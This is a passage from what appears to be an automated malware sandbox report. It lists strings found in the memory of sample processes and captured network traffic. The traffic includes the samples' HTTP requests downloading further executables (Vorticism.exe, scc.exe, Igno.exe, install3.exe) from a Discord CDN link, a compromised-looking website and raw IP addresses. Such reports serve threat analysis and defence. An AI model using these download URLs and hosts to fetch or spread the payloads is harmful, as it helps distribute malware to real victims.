                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: 8CE5.exe.5.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: rcacademy.at
                      Source: global trafficHTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bastinscustomfab.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.bastinscustomfab.comCookie: PHPSESSID=905f1348cca402f214daeb63de69114c
                      Source: global trafficHTTP traffic detected: GET /Igno.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.20.240:7769
                      Source: global trafficHTTP traffic detected: GET /install3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Dec 2021 14:32:14 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.bastinscustomfab.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknown